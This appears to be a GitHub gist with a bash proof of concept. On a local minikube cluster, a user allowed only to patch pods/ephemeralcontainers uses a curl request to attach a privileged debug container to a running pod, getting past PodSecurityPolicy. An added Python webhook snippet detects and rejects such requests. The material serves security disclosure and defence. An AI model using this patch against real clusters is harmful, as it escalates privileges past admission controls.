@mtardy
Last active July 25, 2022 16:06
Small POC demonstrating the problem of not filtering the creation of ephemeral containers at the admission control level. It uses minikube, kubectl and curl as dependencies.
#!/bin/bash
set -e
set -o pipefail

function print {
    # pass the message as an argument rather than in the format string
    printf "\n[+] %s\n" "$1"
}

# re-run the given command (up to 60 times, one second apart) until it succeeds
function retry_for_command_success {
    n=0; until ((n >= 60)); do
        eval "$1" && break;
        n=$((n + 1));
        sleep 1;
    done; ((n < 60))
}

KUBERNETES_VERSION="v1.24.1"

# Creating a k8s cluster with PSP on with minikube
minikube start --kubernetes-version=$KUBERNETES_VERSION --extra-config=apiserver.enable-admission-plugins=PodSecurityPolicy --addons=pod-security-policy

print "Checking that PSP are enabled"
kubectl get psp

print "Waiting for the cluster to be ready, i.e. the default serviceaccount to be created"
retry_for_command_success "kubectl -n default get serviceaccount default -o name"

print "Creating a regular nginx pod with admin cred"
kubectl run nginx --image=nginx

print "Creating a fake user with only patch on pods/ephemeralcontainers"
kubectl create serviceaccount fake-user
kubectl create role fake-debugger --verb=patch --resource=pods/ephemeralcontainers
# the binding targets the User subject "fake-user", which is the identity that --as impersonates below
kubectl create rolebinding fake-debugger-binding --role=fake-debugger --user=fake-user

print "Listing fake user rights"
kubectl --as=fake-user auth can-i --list

print "Opening API proxy as fake user"
kubectl proxy --as=fake-user &
# stop the proxy background process in case of termination
trap "kill $!" SIGINT SIGTERM EXIT

print "Sleeping for a few seconds for the proxy to open"
sleep 3

print "Waiting for the nginx pod to be ready"
kubectl wait --for=condition=Ready pod/nginx

print "Sending the patch for the privileged ephemeral container as the fake user"
curl localhost:8001/api/v1/namespaces/default/pods/nginx/ephemeralcontainers \
    -XPATCH \
    -H 'Content-Type: application/strategic-merge-patch+json' \
    -d '
{
  "spec": {
    "ephemeralContainers": [
      {
        "name": "debugger",
        "command": ["kdigger", "dig", "cap"],
        "image": "nixery.dev/kdigger",
        "targetContainerName": "nginx",
        "securityContext": {
          "privileged": true
        },
        "stdin": true,
        "tty": true
      }
    ]
  }
}'
echo

print "Trying to get the logs from the privileged debug container to verify that it is privileged. Wait until the container image is downloaded and the container is done!"
retry_for_command_success "kubectl logs nginx -c debugger"

print "Removing the minikube cluster, you can use \"minikube delete --purge\" to remove everything in the ~/.minikube folder or just delete that folder."
minikube delete
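The gap the script exercises is that the admission check never looks at the ephemeralcontainers subresource, so a subject with nothing but patch on pods/ephemeralcontainers can attach a privileged container to an already-admitted pod. As an added example that is not part of the gist, the following is the decision logic a validating webhook registered on that subresource would run; it assumes the webhook's rules cover resources ["pods/ephemeralcontainers"] and that the AdmissionReview carries the full Pod in request.object (Kubernetes 1.22 and later), and the sample request is constructed to mirror the gist's curl patch.

```python
# Added example (not part of the gist): the decision logic of a validating webhook
# registered on the pods/ephemeralcontainers subresource. Assumes the AdmissionReview
# carries the full Pod in request.object (the case since Kubernetes 1.22).
from typing import Any, Dict, List


def privileged_ephemeral_containers(pod: Dict[str, Any]) -> List[str]:
    """Names of ephemeral containers whose securityContext requests privileged mode."""
    bad = []
    for ec in pod.get("spec", {}).get("ephemeralContainers") or []:
        if (ec.get("securityContext") or {}).get("privileged") is True:
            bad.append(ec.get("name", "<unnamed>"))
    return bad


def review_ephemeral_containers(review: Dict[str, Any]) -> Dict[str, Any]:
    """Build the AdmissionReview response for one admission request."""
    req = review["request"]
    allowed, message = True, ""
    # A debug-container change only ever arrives on the ephemeralcontainers subresource;
    # a check that looks at plain pod create/update never sees it, the gap the POC shows.
    if req.get("subResource") == "ephemeralcontainers":
        bad = privileged_ephemeral_containers(req.get("object") or {})
        if bad:
            allowed = False
            message = "privileged ephemeral containers are not allowed: " + ", ".join(bad)
    response: Dict[str, Any] = {"uid": req["uid"], "allowed": allowed}
    if not allowed:
        response["status"] = {"code": 403, "message": message}
    return {"apiVersion": "admission.k8s.io/v1", "kind": "AdmissionReview", "response": response}


# Constructed sample request mirroring the gist's curl patch (not a captured request).
SAMPLE_REVIEW = {
    "apiVersion": "admission.k8s.io/v1",
    "kind": "AdmissionReview",
    "request": {
        "uid": "00000000-0000-0000-0000-000000000001",
        "operation": "UPDATE",
        "resource": {"group": "", "version": "v1", "resource": "pods"},
        "subResource": "ephemeralcontainers",
        "userInfo": {"username": "fake-user"},
        "object": {"spec": {
            "containers": [{"name": "nginx", "image": "nginx"}],
            "ephemeralContainers": [{"name": "debugger", "image": "nixery.dev/kdigger",
                                     "targetContainerName": "nginx",
                                     "securityContext": {"privileged": True}}]}},
    },
}
```

Registering the webhook on plain pods is not enough; the rule must name the pods/ephemeralcontainers subresource, otherwise the request above is never forwarded to it.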